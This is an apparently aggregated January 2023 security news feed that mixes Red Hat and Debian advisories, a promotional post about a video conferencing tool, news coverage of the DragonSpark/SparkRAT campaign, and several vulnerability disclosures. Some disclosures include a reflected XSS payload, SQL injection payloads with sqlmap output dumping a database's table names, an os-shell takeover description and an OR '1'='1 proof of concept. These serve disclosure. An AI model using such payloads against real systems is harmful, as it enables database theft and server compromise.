Red Hat Security Advisory 2023-0400-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:0400-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0400  
Issue date:        2023-01-24  
CVE Names:         CVE-2021-26401 CVE-2022-2964  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux for Real Time (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux for Real Time for NFV (v. 7) - noarch, x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

* hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 (CVE-2021-26401)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update to the latest RHEL7.9.z20 source tree (BZ#2152044)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2061700 - CVE-2021-26401 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715  
2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.

6. Package List:

Red Hat Enterprise Linux for Real Time for NFV (v. 7):

Source:  
kernel-rt-3.10.0-1160.83.1.rt56.1228.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.83.1.rt56.1228.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-kvm-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-kvm-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-kvm-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-kvm-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-kvm-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-kvm-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 7):

Source:  
kernel-rt-3.10.0-1160.83.1.rt56.1228.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.83.1.rt56.1228.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.83.1.rt56.1228.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-26401  
https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY9AInNzjgjWX9erEAQjODA/9GAUKKUrU1NdJJSi9v00ACTHBHWqtB2UW  
K9ojblgRnXv0Cuwdxj6xpyBYW3RkVN3b4HBksdxG8jif+gJ/4lc2MbSC41M9srb8  
ckUJJ8mNDeWp6MDYLDJpL7Hb0WKNsaQaOlLHH7u2fWK/r21jOkCyGcUrrGJazENN  
H2xDDfz2JdnIS38Z0RJd80A4VtVt+kz/n9/qHnWXA0+IDyAevEUYt58zw6fclKre  
Rj+5/T4G1wEjHlnaKBy6UczX0INe6AT/2VdtKyiQ0ovENDSFH8cpCxLH44sH1Fqh  
BtyCFEuYuvbCDMgftMw3mTWKW6QtWtMLhmPliIsMuZ9dXkBiQ3Ux6NUem/wNnwFX  
Iu8TvKmnhsYqL2EinAKBV1cJP1lvjLKUUwBRRzW6KDuV8vwJt7AgEsfEjWb2636r  
iiNm0kmLoTNWqcWm0WFWM7UmO0HBcUuAYSopyQlz4erSeFfmTFYos6MzNjVLX3oF  
BXg07KF44akfN+dw8KElYLjjC+5IDYI3pDt4GlF4VoyuIgh5sZRkxwNeKQC7IsQB  
nhJoGQ6PRruz8sW2+wbSQLXWqr3+NDX/GMOPGQOAUt5S+7uD6lKkUjjPzTtvwOtS  
i9FTjzvuVnXwEfEmycZFLQx6bIsfARlwvdOY1QrJmo2joWQ0iOCL30u4k0JAlTF/  
zRiMS5eelho=h5Hj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0400-01

By Owais Sultan
What is video conferencing? It’s a mode of communication which allows you to conduct meetings with all participants…
This is a post from HackRead.com Read the original post: The benefits of video conferencing with iMind

What is video conferencing? It’s a mode of communication which allows you to conduct meetings with all participants in different places at the same time. This means that each participant can see and hear everyone else in real time, as well as share data and files.

Group secure video conferencing software is a tool widely used for personal and business needs nowadays. But not all companies are informed well enough about the helpfulness of this communication mode. That’s why we describe all the advantages of video conferencing as a mode of interaction. 

**Incorporating Video Conferencing Into Your Workflow**

Video conferences benefit from the use of modern technologies and communication platforms. Most of the companies that have adopted such technology have started to see a positive change in their collaboration and productivity. There are some common benefits, including:

*   The ability to have face-to-face meetings with customers and partners from around the world. This is especially useful for companies that work with a global audience.
*   Improved communication between employees from different locations within your company due to real-time interaction on a video call.
*   Increased productivity due to remote working possibilities and less time spent travelling from one place to another.

As a rule, video conferencing is used in business meetings, when people want to communicate with each other virtually. This allows for saving a lot of time and money, as well as increasing the efficiency of teamwork.

The main benefit of video conferencing software is its ability to provide clear communication between users in real-time. With the help of this tool, you can hold meetings with various participants from different parts of the world or even countries at once!

**Using iMind for Working Video Conferencing **

Even though you’ll need a paid plan to unlock some of iMind’s best features, the free plan includes all of its core strengths:

*   an easy-to-use interface
*   possibility of use via browser
*   simple creation and connection of rooms
*   simultaneous screen sharing – high-quality video (up to HD), high-quality sound.

The ability to share screens is useful in many situations, and you can connect up to 100 people for collaboration or a webinar.  

With iMind, you have the opportunity to use almost all the features of the service for free. There is no trial period, you can use the free version with no time limit. However, if you have a need for more possible participants or a longer duration of the conference, you should consider a Business or Enterprise plan.

**iMind or Other Services?**

The iMind platform is a contemporary, up-to-date system that provides a variety of functions for business applications. The software can be used as both an effective tool for standardization and innovation – and it’s hard to deny the benefits of this program for businesses.

1.  How To Make A Messenger App
2.  Best Legal Software For Law Firms
3.  Product Review – Stellar Repair for MS SQL
4.  Zoom adds 2FA as an extra layer of security
5.  How Technology Altered Education Landscape

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

The benefits of video conferencing with iMind

Hackers cleverly cobbled together a suite of open source software — including a novel RAT — and hijacked servers owned by ordinary businesses.

We imagine that the world’s most successful hackers write their own dangerous code and invest heavily in the technologies they use to breach their targets. In recent months, however, a new cluster of attacks succeeded with just the opposite approach.

According to a report out Jan. 24 from SentinelOne, a threat actor compromised a number of organizations across China and Taiwan by creating a Frankenstein's monster-style composite of preexisting open source components. Among them: multiple tools for escalating user privileges in Windows machines, and for establishing persistence and allowing remote code execution.

In addition to adopting other hackers' code, the attackers freely adopted other organizations' infrastructure, too. In staging their malware, the hackers puppeteered servers located in China, Hong Kong, Singapore, and Taiwan, many of which were hosted by perfectly ordinary businesses, including an art gallery, a retailer for baby products, and companies in the gaming and gambling industries.

Researchers from SentinelOne named the campaign "DragonSpark" — a portmanteau referencing the attackers' Chinese-language links, and "SparkRAT," an open source remote access Trojan (RAT) never seen in the wild until now.

**An Open Source Party**

To gain initial access to their targets, the DragonSpark attackers sought out Internet-exposed Web servers and MySQL database servers. Then, with a foot in the door, they began deploying open source malware.

"Open source tools and existing infrastructure are very practical to threat actors," Aleksandar Milenkoski, senior threat researcher at SentinelOne, tells Dark Reading. This is especially true of "actors involved in cybercrime activities without many resources and in-depth technical readiness to develop their own tool set and setup an intricate infrastructure, but aiming for large-scale, opportunistic attacks at the same time."

The DragonSpark attackers carried out their opportunistic attacks with programs like SharpToken and BadPotato, which enable the execution of commands at the level of the Windows operating system. SharpToken also provides visibility to user and process information; it allows a user to freely add, delete, or modify passwords of system users. BadPotato, the researchers noted, had been previously used by other Chinese threat actors in an espionage campaign.

Next in the arsenal was GotoHTTP, which facilitates persistence, file transfer, and remote screen viewing. But the most notable malware of all was SparkRAT — "a very recent development on the threat landscape," Milenkoski noted. DragonSpark represents "the first concrete observation of threat actors using SparkRAT as part of larger campaigns."

Released in its current version on Nov. 1, 2022, SparkRAT is a jack of all trades. It's compatible with not only Windows but also Linux and macOS systems. Its most notable features are as follows, as the researchers outlined:

*   _**"Command execution:** including execution of arbitrary Windows system and PowerShell commands;_
*   _**System manipulation:** including system shutdown, restart, hibernation, and suspension;_
*   _**File and process manipulation:** including process termination as well as file upload, download, and deletion; and_
*   _**Information theft:** including exfiltration of platform information (CPU, network, memory, disk, and system uptime information), screenshot theft, and process and file enumeration."_

SparkRAT, SharpToken, Bad Potato, and GotoHTTP are all freely available to download online. As open-source tools, their use also makes attribution more difficult.

**Links to China**

All of the targets of DragonSpark were organizations based in East Asia. Many of them "have a large customer base," Milenkoski observes, "leading to the belief that the threat actors may be targeting customer data." Whether the motive was cybercrime or espionage was not determined.

Though unable to attribute anyone specific, the researchers considered it "highly likely" that the DragonSpark attackers were Chinese speakers. That is, in part, explained by the fact that most of their infrastructure and targets were located in East Asia. Additionally, the Web shell they used to deploy their malware — a well-known tool called China Chopper — and all of the open source tools described above were originally developed by Chinese-speaking developers and vendors.

This is consistent with recent activity in the world of Chinese threat actors. An alert published last summer by the Cybersecurity and Infrastructure Security Agency (CISA) highlighted how state-sponsored APTs from the People's Republic "often mix their customized toolset with publicly available tools."

All signs point to more of these kinds of attacks going forward. SparkRAT in particular, though nascent to the scene, "is regularly updated with new features," the SentinelOne researchers noted, adding that "the RAT will remain attractive to cybercriminals and other threat actors in the future."

'DragonSpark' Malware: East Asian Cyberattackers Create an OSS Frankenstein

Inout Search Engine version 10.1.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Search Engine 10.1.3                                                 ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpMethod: GETURL parameter 'page' is vulnerable to XSShttps://www.example.com/index.php?page=footer%2femailafriendlaten%3cimg%20src%3da%20onerror%3dalert(1)%3ef96cd[-] Done

Inout Search Engine 10.1.3 Cross Site Scripting

Inout Homestay version 2.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Homestay 2.2                                                         ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php?page=search/searchdetailedbroom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=IndianapolisPOST parameter 'broom' is vulnerable to SQLIPOST parameter 'bathr' is vulnerable to SQLIPOST parameter 'beds' is vulnerable to SQLIPOST parameter 'numguest' is vulnerable to SQLIPath: /index.php?page=search/rentalslocation=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=IndianaPOST parameter 'guests' is vulnerable to SQLI---Parameter: broom (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split    Type: UNION query    Title: Generic UNION query (NULL) - 27 columns    Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split---[INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12[INFO] fetching tables for database: '*****_homestay'Database: *****_homestay[52 tables]+----------------------------------+| admin_account                    || admin_payment_details            || category_property                || chat_details                     || chat_messages                    || checkout_ipn                     || countries                        || coupon_detail                    || cron_details                     || custom_field                     || demo_message                     || email_details                    || email_templates                  || forgetpassword                   || host_rejected                    || inout_ipns                       || languages                        || list_date_request                || list_images                      || listing_date                     || listing_detail                   || listing_main                     || message_notify_app               || messages                         || msg_req_temp                     || ppc_currency                     || public_side_media_detail         || public_slide_images              || refund_creditupdate              || request_coupon_detail            || settings                         || superhost_detail                 || traveller_bank_deposit_history   || traveller_cancellation_modes     || traveller_cancelled              || user_account_detail              || user_address_verify_request      || user_details                     || user_email_verification          || user_listing_request             || user_refunddetails               || user_registration                || user_reviews                     || user_search_details              || user_settings                    || user_wishlist_mapping            || user_withdrawal_details          || userabusereport                  || userbank_pending_listing_request || usercancellationsaction          || wish_list                        || withdrawal_request               |+----------------------------------+[-] Done

Inout Homestay 2.2 SQL Injection

Debian Linux Security Advisory 5325-1 - It was discovered that SPIP, a website engine for publishing, would allow a malicious user to SQL injection attacks, or bypass authorization access.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5325-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondJanuary 24, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : spipIt was discovered that SPIP, a website engine for publishing, wouldallow a malicious user to SQL injection attacks, or bypassauthorization access.For the stable distribution (bullseye), this problem has been fixed inversion 3.2.11-3+deb11u6.We recommend that you upgrade your spip packages.For the detailed security status of spip please refer toits security tracker page at:https://security-tracker.debian.org/tracker/spipFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmPPpdYACgkQEL6Jg/PVnWT7GQgAgemz9C/cvulSLwEuV38WAaZwy8RFC3CGw3DirFLf2tVeC6KDI+tGs/u4XSY7M45xEr4y1TR3NMfovrnX6iR/JgPU/3ZJsFquq8O5Z9WCeZFe2YCkmuqP9hQvtxXfOoL4c9b1hfgtv4nVcqLyCFFJhfqLiAy8Eb18vzuggjLVYKa1kioa8wAGk/YBB9rvoKNN1bBfow7A7704Gk2bJMfcxIC9P4anHm6u0OZ4HgC0GYpVYZXegfrFICs7fylqgcg6Ub+HH+6e3wEDN1oqnj0IQDy09lFj4kCT5xQjhQM8oMZChExndWdmRRI2iEmUN/gg7RVhdUfNvv8VTy1lo+wd4g==XA3L-----END PGP SIGNATURE-----

Debian Security Advisory 5325-1

Organizations in East Asia are being targeted by a likely Chinese-speaking actor dubbed DragonSpark while employing uncommon tactics to go past security layers.
"The attacks are characterized by the use of the little known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation," SentinelOne said in an analysis published today.
A striking

Organizations in East Asia are being targeted by a likely Chinese-speaking actor dubbed **DragonSpark** while employing uncommon tactics to go past security layers.

"The attacks are characterized by the use of the little known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation," SentinelOne said in an analysis published today.

A striking aspect of the intrusions is the consistent use of SparkRAT to conduct a variety of activities, including stealing information, obtaining control of an infected host, or running additional PowerShell instructions.

The threat actor's end goals remain unknown as yet, although espionage or cybercrime is likely to be the motive. DragonSpark's ties to China stem from the use of the China Chopper web shell to deploy malware – a widely used attack pathway among Chinese threat actors.

Furthermore, not only do the open source tools used in the cyber assaults originate from developers or companies with links to China, the instructure for staging the payloads are located in Taiwan, Hong Kong, China, and Singapore, some of which belong to legitimate businesses.

The command-and-control (C2) servers, on the other hand, are situated in Hong Kong and the U.S., the cybersecurity firm said.

Initial access avenues entail compromising internet-exposed web servers and MySQL database servers to drop the China Chopper web shell. The foothold is then leveraged to carry out lateral movement, privilege escalation, and malware deployment using open source tools like SharpToken, BadPotato, and GotoHTTP.

Also delivered to the hosts are custom malware capable of executing arbitrary code and SparkRAT, a cross-platform remote access trojan that can run system commands, manipulate files and processes, and siphon information of interest.

Another malware of note is the Golang-based m6699.exe, which interprets at runtime the source code contained within it so as to fly under the radar and launch a shellcode loader that's engineered to contact the C2 server for fetching and executing the next-stage shellcode.

"Chinese-speaking threat actors are known to frequently use open source software in malicious campaigns," the researchers concluded.

"Since SparkRAT is a multi-platform and feature-rich tool, and is regularly updated with new features, we estimate that the RAT will remain attractive to cybercriminals and other threat actors in the future."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Utilize Golang Malware in DragonSpark Attacks to Evade Detection

Amano Xoffice parking solutions 7.1.3879 is vulnerable to SQL Injection.

Good day everyone! I hope all of you are doing well.

SQL Injection is one of the most critical vulnerabilities that can be found in web applications I will show you how we found SQL Injection vulnerability as an Authenticated user, which leads to compromising the back-end database while hunting.

**What SQL Injection is and how to spot it**

SQL injection is a code injection technique for applications with a database connection. The malicious user sends a crafted SQL query to extract, add, modify, or delete data from the database.

*   **Vulnerable Software**: Amano Xoffice parking solutions
*   **Vulnerability:** time-based blind SQL injection
*   **Affected Version:** 7.1 (7.1.3879)
*   **Vendor Homepage:**https://www.amano.eu/en/
*   **CVE:**2023–23331

**Amano Xoffice parking solutions:**

Amano’s Xoffice parking solutions refers to Xparc’s extensive, reliable carpark management software. This makes it the ideal solution for any type of car park.

**Required Components:**

**Burp Suite:** HTTP proxy tool for intercepting requests.

**sqlmap:** an open-source penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over database servers.

**Steps to executions:**

1- Find the vulnerable parameter “**_dt\_insert”_**, and try using a different SQL injection wordlist with help of an intruder in burp-suite but we got nothing.

then inject the parameter using a different SQL injection payload and I get a delayed response on the vulnerable page with HTTP 200 ok response header when using PG\_SLEEP(5) payload.

2-We save the request and send it using sqlmap.

\*sqlmap request.req\*\*

In the below screenshot the request in burp-suite when injecting **dt\_insert** parameter with the payload.

burp-suite request

As seen below the SQL injection when we send the request through sqlmap and we get a different result Such as the operating system and back end DBMS.

Using sqlmap features os-shell we are able to get command execution shell on the back-end DBMS using the SQL injection vulnerability.

POC of the shell

*   **Acknowledgment:**

Thanks to the team i have been working with: Saleh alfawazan and Osama Aldosari.- Saudi information and technology company — SITE.

CVE-2023-23331: How I Found My FIRST SQL Injection CVE-2023–23331 - Fahad Almulhim (0xHunter) - Medium

IzyBat Orange casiers before 20221102_1 allows SQL Injection via a getCasier.php?taille= URI.

**Overview**

An authenticated remote attacker can perform a time based SQLi injection in Orange casiers database.  
Note: everyone can sign up to have a user account.

**Impact**

Informaction disclosure

**Details**

A time based SQLi has been detected on http://orange-casiers.fr/getCasier.php?taille=b via the “taille” parameter.  
The SQLi allowed us to dump the database containing: First name, family name, password’s hashes, badge serial numbers …

**Not affected version**

20221102\_1

**Proof of Concept**

You need to select a locker block that manage choosing a top or bottom locker.  
When ask if you prefer a top or bottom locker, visit the URL http://orange-casiers.fr/getCasier.php?taille=1’+OR’1’%3D’1 instead to get the first locker available regardless of its physical location.  
Revisiting the URL allow a user to get another locker, regardless of the limitation usually in place of 1 locker/person. In fact, you could reserve every single lockers available.

**Solution****Security patch**

Upgrade to 20221102\_1

**References****Credits**

Orange CERT-CC  
Hugo VOVARD at Orange group

**Timeline**

**Date reported:** November 2, 2022  
**Date fixed:** November 2, 2022

CVE-2023-22630: IzyBat Orange casiers - SQLi injection

Auth. SQL Injection (SQLi) vulnerability in WP-TopBar <= 5.36 versions.

**Solution**

Deactivate and delete. This plugin has been closed as of January 18, 2023 and is not available for download. This closure is temporary, pending a full review.

thiennv discovered and reported this SQL Injection vulnerability in WordPress WP TopBar Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information and creating new administrator accounts. This vulnerability has not been known to be fixed yet.

**3 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

Tag

#sql